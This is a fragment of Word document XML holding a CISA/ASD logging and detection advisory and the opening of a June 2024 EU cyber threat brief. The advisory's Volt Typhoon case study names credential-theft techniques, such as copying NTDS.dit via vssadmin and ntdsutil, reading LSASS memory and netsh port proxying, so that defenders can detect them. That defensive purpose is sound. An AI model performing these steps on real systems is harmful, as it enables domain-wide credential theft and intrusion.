        <w:t>A baseline is derived by performing an analysis of normal behavior of some user accounts and establishing 'always abnormal' conditions for those same accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber security events.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For the purpose of this document, a cyber security event is an occurrence of a system, service or network state indicating a possible breach of security policy, failure of safeguards or a previously unknown situation that may be relevant to security.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber security incidents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For the purpose of this document, a cyber security incident is an unwanted or unexpected cyber security event, or a series of such events, that either has compromised business operations or has a significant probability of compromising business operations. Timely Ingestion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Timely ingestion of event logs is important in the early detection of a cyber security events and cyber security incidents. If the generation, collection and ingestion of event logs is delayed, the organization's ability to identify cyber security incidents is also delayed. Detection Strategy for Relevant Threats Detecting Living Off the Land Techniques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ASD and co-authors recommend that organizations consider implementing user and entity behavioral analytics capabilities to enable automated detection of behavioral anomalies on networks, devices, or accounts. SIEMs can detect anomalous activity by comparing event logs to a baseline of business-as- usual traffic and activity. Behavioral analytics plays a key role in detecting malicious actors employing LOTL techniques. Below is a case study that shows how threat actors leveraged LOTL to infiltrate Windows-based systems.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Case study - Volt Typhoon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Since mid-2021, Volt Typhoon has targeted critical infrastructure organizations by relying almost exclusively on LOTL techniques. Their campaign has been enabled by privately-owned SOHO routers, infected with the 'KV Botnet' malware.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 uses PowerShell, a command and scripting interpreter, to: Discover remote systems [T1059.001, T1018].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify associated user and computer account names using the command Get-EventLog security -instanceid 4624 [T1033].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enumerate event logs to search for successful logons using wevtutil.exe and the command Get-EventLog Security [T1654].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 consistently obtains valid credentials by extracting the Active Directory database file NTDS.dit.[6] To do so, Volt Typhoon has been observed to: Execute the Windows-native vsssadmin command to create a volume shadow copy [T1006].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use Windows Management Instrumentation Console (WMIC) commands [T1047] to execute ntdsutil.exe to copy NTDS.dit and the SYSTEM registry from the volume shadow copy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Move laterally to the Microsoft Active Directory Domain Services (AD DS) domain controller via an interactive RDP session using a compromised user account with domain administrator privileges [T1021.001].</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 LOTL techniques that Volt Typhoon has been observed to use includes: Accessing hashed credentials from the Local Security Authority SubSystem Service (LSASS) process memory space [T1003.001].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using ntdsutil.exe to create installation media from Microsoft AD DS domain controllers, either remote or locally, which contain username and password hashes [T1003.003].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using PowerShell, WMIC, and the ping command, to facilitate system discovery [T1018].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using the built-in netsh portproxy command to create proxies on compromised systems to facilitate access [T1090].</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While Volt Typhoon uses LOTL techniques to make detection more difficult, the behaviors that the malware exhibits would be considered abnormal compared to business-as-usual activity and could be used to create detection use cases.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more information, consider visiting MITRE ATT&amp;CK(R)'s Volt Typhoon page and the MITRE ATT&amp;CK framework.</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Examples of anomalous behavior can include: A user logging in during unusual hours (e.g. non-working hours, holidays or on leave).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>An account accessing services that it does not usually access; for example, administrator or HR services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A user logging in using an unusual device.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A high volume of access attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Instances of impossible travel[7] or concurrent sign-ins from multiple geographic locations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Downloading or exporting a large volume of data.[8] Network logins without defined computer access or physical access log validation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A single IP address attempting to authenticate as multiple different users. The creation of user accounts, or disabled accounts being re-enabled, especially accounts with administrative privileges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Netflow data indicating one device talking to other internal devices it normally does not connect to.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unusual script execution, software installation, or use of administrative tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unexpected clearing of logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>An execution of the process from an unusual or suspicious path.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configuration changes to security software, such as Windows Defender, and logging management software.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Note that the above items could be legitimate behavior and not malicious activity. In these instances, further investigation by a network defender is required to determine if they are, in fact, evidence of a cyber security event.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 detect threats on endpoints such as user devices, organizations should consider implementing an endpoint detection and response solution. These solutions enable an organization to monitor malicious activity, such as malicious actors disabling security monitoring services, and process creation events with enhanced detail and fidelity.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following the guidance in this publication to improve the collection and centralization of event logs, it will improve an organization's ability to undertake effective threat hunting to proactively investigate LOTL compromises. Organizations should consider conducting threat hunting on their networks as a proactive measure to detect cyber security incidents. This is a particularly effective activity for detecting malicious actors employing LOTL techniques.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Organizations may also consider the following methods to increase the effectiveness of detecting potential LOTL techniques: Cloud Considerations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joint-sealed publication Identifying and Mitigating Living Off the Land Techniques contains detailed detection guidance for cloud environments. One point states that if machine learning-powered detection capabilities are available within cloud provider security services, organizations should consider leveraging these capabilities and provide log data in real time from multiple sources to enhance log analysis. Using machine learning allows for the detection of anomalous behaviors that may indicate malicious activity. These include irregular API call patterns (especially those that involve changes to security groups, configuration of cloud resources or access to sensitive data), unusual cloud storage access and atypical network traffic. Operational Technology Considerations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Effective detection in an OT environment typically involves expertise from both IT and OT personnel; thus, an effective network security instrumentation involves collaborative efforts from both parties. This collaborative approach helps ensure that network defenders can quickly investigate relevant issues, and OT experts can raise operational concerns that may be tied to a cyber security incident. Furthermore, network defenders should leverage real-time alerts to determine any abnormal activity on an OT network. These alerts can include safety data, availability data, logins, failed logins[9], configuration changes, and network access and traffic. Organizations may need to consider whether alerts for OT environments should be approached differently. For example, OT devices may be in remote or hard-to-reach locations.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detecting anomalous behavior in OT environments, look for: Unexpected use of engineering and configuration tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Abnormal use of vendor or third-party accesses, maintenance methods, or remote monitoring.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unauthorized updates or changes to operating systems, software, firmware, configurations, or databases.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unexpected communication between the control system and external network or unusual communication between components that do not usually communicate.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Execution of scripts that are not part of regular operations.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Intrusion detection and intrusion prevention systems (IDS/IPS) are often designed with rules based on IT protocols; therefore, they may be more useful in OT operation systems or the OT demilitarized zone (DMZ) than in supervisory and process areas. Note, it is not recommended to deploy an IPS unless it is tailored to the OT environment, or is outside of critical process control. IPS risk interrupting critical OT devices. Additional Guidance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further guidance, consider visiting: Joint-sealed Identifying and Mitigating Living off the Land Techniques ASD ACSC's Windows Event Logging and Forwarding CISA's Guidance for Implementing M-21-31: Improving the Federal Government's Investigative and Remediation Capabilities CISA's SCuBA TRA and eVRF Guidance Documents NSA's Cyber Event Forwarding Guidance NCSC-UK's What exactly should we be logging?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">NIST's SP 800-92 Rev. 1, Cybersecurity Log Management Planning Guide NIST's Guide to Operational Technology </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(OT) Security US White House's M-21-31 Malcolm | A powerful, easily deployable network traffic analysis tool suite MITRE ATT&amp;CK(R)'s Data Sources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Footnotes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 While the audience for the cited guidance is U.S. Federal Civilian Executive Branch agencies, it may provide useful guidance to all entities regarding logging best practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[2] While only binding on U.S. Federal information systems, excluding national security systems, this memorandum may provide useful guidance to all entities regarding logging best practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[3] CISA's "First 48": What to Expect When a Cyber Incident Occurs [4] The prioritized list focuses on logs that enable the detection of a malicious actor operating remotely. In this context, collecting logs from an air-gapped system is not a high priority unless malicious insiders are a concern.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[5] MDM and MAM events are likely to be server-sent events, but they may also be generated by software deployed to the mobile device.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[6] NTDS.dit contains usernames, hashed passwords, and group memberships for all domain accounts, allowing for full domain compromise if the hashes can be cracked offline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[7] Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[8] Large/continuous data exports should be alerted by default.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[9] Note that not all successful authentication events will be benign (e.g., credential theft or malicious insiders). Disclaimer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material in this guide is of a general nature and should not be regarded as legal advice or relied on for assistance in any particular circumstance or emergency situation. In any important matter, you should seek appropriate independent professional advice in relation to your own circumstances.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CISA and the Commonwealth of Australia accept no responsibility or liability for any damage, loss or expense incurred as a result of the reliance on information contained in this guide. Copyright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Commonwealth of Australia 2024.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All material presented in this publication is provided under a Creative Commons (CC) Attribution 4.0 International license.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the avoidance of doubt, this means this license only applies to material as set out in this document.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details of the relevant license conditions are available on the Creative Commons website as is the full legal code for the CC BY 4.0 license.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.08.22 02:53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-234a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cyber Brief 24-07 - June 2024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July 1, 2024 - Version: 1.0</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TLP:CLEAR Executive summary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 analysed 402 open source reports for this Cyber Security Brief1.</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Relating to cyber policy and law enforcement, the EU Council sanctioned six individuals with links to Russia for cyberattacks against member states and Ukraine, German report warned of the escalating cyber threats from APT27, APT28, and Charming Kitten, and an EU Innovation Hub report highlights challenges in criminal investigations due to encrypted communications and emerging technologies. In the US, the Biden administration banned sales of Kaspersky Lab Software, and Microsoft acknowledged responsibility for US government security breaches.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 the cyberespionage front, in Europe, China-linked SneakyChef reportedly used RATs to target Ministries of Foreign Affairs, and several reportedly Russia-linked threat actors were active in cyberespionage campaigns, namely BlueDelta group that targeted European networks, APT29 that compromised TeamViewer, and several groups targeting Ukraine. Globally, Microsoft notified affected customers of e-mail conversations with Microsoft having been exfiltrated by APT29, there were several reports about alledgedly China-linked threat actors' operations.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Relating to cybercrime, in Europe, the most active ransomware operations were Ransomhub, Dragonforce, Cactus, Blackbasta, Arcusmedia, while the most targeted sectors were technology, manufacturing, legal &amp; professional services, transportation, and food.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were many information operations throughout Europe, namely Russia- aligned targeting of all 27 EU countries ahead of the European elections, as well as targeting of France due both to their legislative elections and to the Summer Olympics. Elsewhere, Russia-linked disinformation campaigns were also uncovered, and one was found targeting the US through fake CIA videos.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 regards data exposure and leaks incidents, Google reportedly suffered a data leak, while Ticketmaster confirmed a breach after stolen data was found for sale online.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 the hacktivism front, there were DDoS attacks in at least 16 EU countries during the European Elections.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In this Cyber Brief we have included several significant vulnerabilities and associated advisories reported in June 2024. Europe Cyber policy and law enforcement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Six individuals added to EU sanctions list for malicious cyber activities against EU member states and Ukraine On June 24, the EU Council added six individuals to its sanctions list for cyberattacks against member states and Ukraine. These include members of the Russia-linked threat actors Callisto and Armageddon, as well as operators of Conti and Trickbot malware. The measures include asset freezes and travel bans. sanctions russia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German intelligence report 2024: escalating cyber threats from APT27, APT28, and Charming Kitten On June 17, the German domestic intelligence agency (BfV) released the "2024 Report on the Protection of the Constitution" highlighting increased cyber threats. The report detailed heightened ransomware attacks, espionage by state-backed groups such as China's APT27, Russia's APT28, and Iran's Charming Kitten, hacktivism linked to the Ukraine conflict, and targeted attacks on Iranian dissidents living in Germany. The BfV called for strategic realignment and significant investments in cyber defence. iran russia china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EU Innovation Hub report highlights challenges in criminal investigations due to encrypted communications and emerging technologies On June 10, the EU Innovation Hub for Internal Security published a report addressing the challenges posed by encrypted communications, quantum computing, cryptocurrencies, biometric data, AI, and large language models in criminal investigations. The report highlights the difficulties law enforcement agencies face with encrypted platforms like EncroChat and SkyECC, the increasing complexity of tracing illicit cryptocurrency transactions, and the dual impact of advanced technologies on both strengthening and weakening encryption. encryption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Poland's government seizes devices used to operate Pegasus spyware from Central Anti-corruption Bureau On June 18, Poland's National Prosecutor's Office seized several devices that were used to operate Pegasus spyware from the Central Anti-corruption Bureau (CBA). The National Prosecutor's Office also acquired documents concerning Pegasus spyware purchases from the CBA, Internal Security Agency, and the Military Counterintelligence Service. The seized devices were sent for forensic analysis. High-profile Polish leaders were asked to testify on the use of Pegasus. seizure psoa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EU and US take down servers belonging to the Islamic State On June 17, Europol, the FBI, and the US Department of Justice announced a partnered action that resulted in the largest global disruption of online critical infrastructure used by the Islamic State (ISIS) to disseminate propaganda and terrorist communications. The action brought down servers in several countries including Germany, Iceland, the Netherlands, and the US. take down Cyberespionage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China-linked SneakyChef uses SugarGh0st RAT to target Ministries of Foreign Affairs On June 21, Cisco Talos disclosed a new cyberespionage group they named SneakyChef, that has targeted Ministries of Foreign Affairs (MFA) and embassies all over the world, including in Latvia since at least August 2023. This campaign is still ongoing, with new targets despite the same malware strains SpiceRAT and SugarGh0st (Gh0stRAT variant), and tactics being used. china diplomacy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GRU's BlueDelta targets European networks in multi-phase espionage campaign On May 30, Recorded Future reported that GRU's BlueDelta group conducted a multi-phase espionage campaign from April to December 2023. The group reportedly targeted European networks with Headlace malware and credential- harvesting web pages and used phishing, compromised internet services, and legitimate binaries to steal information, focusing on Ukraine's Ministry of Defence, European transport infrastructure, and an Azerbaijani think tank. russia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FlyingYeti phishing campaign targeting Ukraine On May 30, Cloudflare reported details on a Russia-aligned threat actor FlyingYeti phishing campaign targeting Ukraine. The FlyingYeti campaign capitalised on the anxiety of Ukrainians over the potential loss of access to housing. If they open malicious files via debt-themed lures, the files would result in infection with the PowerShell malware known as Cookbox, allowing FlyingYeti to support follow-on objectives, such as installation of additional payloads and control over the victim's system. russia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Russia-linked APT29 compromises TeamViewer corporate IT network On June 27 and 28, TeamViewer, a Germany-based company that has a remote access and remote control software of the same name, announced it suffered a compromise of their internal corporate IT network. TeamViewer attributed the compromise to APT29, revealing the initial access was made through the compromise of credentials of an employee account. russia technology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UAC-0200 targets defence companies in Ukraine On June 4, CERT-UA reported about targeted cyberattacks against civil servants, military, representatives of defence enterprises of Ukraine using the malicious program DarkCrystal remote access trojan (RAT), which is distributed by means of messenger Signal. defence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APT attack targeting the network of the CDU German political On June 1, the German Ministry of Interior (Bundesministerium des Innern und f"ur Heimat) disclosed a serious cyberattack on the network of the CDU, a German political party. They said that BSI / CERT-Bund and the Federal Office for the Protection of the Constitution are working intensively to ward off the attack, investigate it and prevent further damage. political parties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Rafel RAT Android malware exploiting devices for cyberespionage and ransomware operations On June 20, Check Point revealed that Rafel RAT, an Android malware, is used in espionage and ransomware campaigns. The malware targets devices in the United States, China, Indonesia, and European countries, including Romania. Rafel RAT enables remote access, data exfiltration, location tracking, and two-factor authentication bypass, impacting high-profile sectors like the military and government infrastructure. Cybercrime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Sophisticated V3B phishing kit targets European financial institutions, enhancing threat landscape On June 4, researchers reported the emergence of a new phishing kit named V3B, which is being used to target 54 financial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>institutions across multiple European countries, including Germany, France, and Italy. The kit, offered for 130-450 US dollars per month, features advanced capabilities such as encryption, stealing of OTPs and 2FA codes, live victim interaction, and uses PhotoTAN and SmartID bypass methods, signalling a sophisticated Phishing-as-a-Service (PaaS) operation. phishing kit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Ransomware attack disrupts London hospitals On June 3, according to the BBC, a ransomware attack on Synnovis, a provider of pathology services, severely disrupted multiple NHS hospitals in London. The attack impacted blood transfusions and other critical services, leading to the cancellation and redirection of some medical procedures. Emergency care remained available. Media reports have linked Qilin ransomware to the attacks. health</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StrelaStealer resurgence targets European email credentials On June 24, SonicWall Capture Labs reported on the significant rise of StrelaStealer, which targets European users by stealing Outlook and Thunderbird e-mail credentials. This malware avoids Russian systems by checking the system's keyboard layout. It operates by initially infecting with an obfuscated JavaScript file via e-mail, which then releases a DLL that injects the stealer into the process. The malware particularly targets users in Poland, Spain, Italy, and Germany. russia Information operations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Russian and Iranian influence networks target French legislative elections On June 28, Recorded Future reported that Russian and Iranian influence networks are targeting the French legislative elections, with minimal impact so far. The Russia-linked Doppelg"anger network employs cloned websites and social media bots to impersonate French media, spreading pro- Russian and eurosceptic content. The CopyCop network, using AI, manipulates articles from legitimate sources to undermine President Macron. Iran's involvement, through a network called International Union of Virtual Media, is limited, likely due to France's support for Israel. iran russia election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Russia-aligned information operations aim to undermine the summer Olympics On June 2, Microsoft reported that a Russia-aligned information operation is focusing on spreading negative narratives relating to the summer Olympics in France. One of the messages spread was a fake Tom Cruise persona which was disparaging the International Olympic Committee's leadership. russia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Pro-Russia Pravda disinformation campaign targets all 27 EU countries On June 3, 2024, the European Digital Media Observatory (EDMO) reported on a Russian disinformation campaign targeting the EU elections. This campaign, linked to the Russian state-controlled media outlet Pravda, involved a network of fake news sites and social media accounts spreading false information across Europe. The campaign utilised AI-generated content and deepfake videos to influence public opinion, targeting all 27 EU countries and some non-EU countries. russia election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Euromore: Russia's new information warfare tool On June 2, Le Monde reported about Kremlin-linked organisations creating Euromore to replace banned Russian state media RT and Sputnik in Europe. Launched in March 2022, Euromore presents itself as an independent European outlet but is actually funded by Pravfond and Rusfuture, both close to Russian intelligence. Euromore disseminates pro-Russian narratives and combats anti-Russian sentiments, illustrating a significant shift in Russia's information operations in response to European sanctions. russia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Polish State News Agency breached; Poland authorities claim attack likely Russia-backed On May 31, Polish authorities reported that the state-owned Polish Press Agency (PAP) experienced a cyberattack. A threat actor posted a false article to the PAP's website stating Polish Prime Minister Donald Tusk ordered a "partial mobilisation" to begin on July 1, 2024. Polish authorities claimed the breach was part of a Russia-backed information operation ahead of the upcoming June 2024 EU elections. russia election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Moldovan brothers own UK-based shell company reportedly involved in Russian influence operations in Europe 0n May 31, researchers at Correctiv revealed that the Neculiti brothers from Moldova support Russia's cyber warfare against Europe through their web-hosting company PQ Hosting. These services are used for disinformation campaigns and cyber attacks. Despite international sanctions, their operations circumvent restrictions. They claim that Stark Industries Solutions, a company previously reported to have been involved in similar activities, is a shell company for PQ Hosting. russia Hacktivism</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DDoS attacks in at least 16 EU countries and a Union entity during European Parliament Elections During the European Parliament Elections which took place from June 6 to June 9, a collective of pro-Russia supposed hacktivists, including NoName057(16), HackNeT, and Russian Cyber Army conducted DDoS attacks on the websites of organisations in 16 EU countries and two Union entities. The attacks were mostly focused on public transport infrastructure in many EU countries, a few public administrations and a legislative body. russia transport election public administration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Russia-linked hacktivists target Romania On June 17, Cyber Army of Russia announced on Telegram they were starting a DDoS campaign targeting several services in Romania, starting with the port of Constanza. They did this in response to the country's denial of visas to a Russian delegation to attend the OSCE Parliamentary Assembly. russia World Cyber policy and law enforcement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AWS introduces FIDO2 passkeys and mandates MFA for root accounts by July 2024 On June 12, Amazon Web Services (AWS) announced that it has introduced FIDO2 passkeys for multi-factor authentication (MFA) to enhance account security and usability, offering resistance to phishing and man-in-the- middle attacks. AWS has also reminded users that root accounts must enable MFA by the end of July 2024, with a phased rollout beginning initially for root users and expanding over time. multi-factor authentication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AI jailbreaks On June 4, Microsoft shared details about AI jailbreaks. AI jailbreaks are attacks that can circumvent safeguards, causing AI systems to produce harmful or unintended outputs. Such vulnerabilities arise from overconfidence, gullibility, and susceptibility to manipulation. Mitigation involves layered defences like prompt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
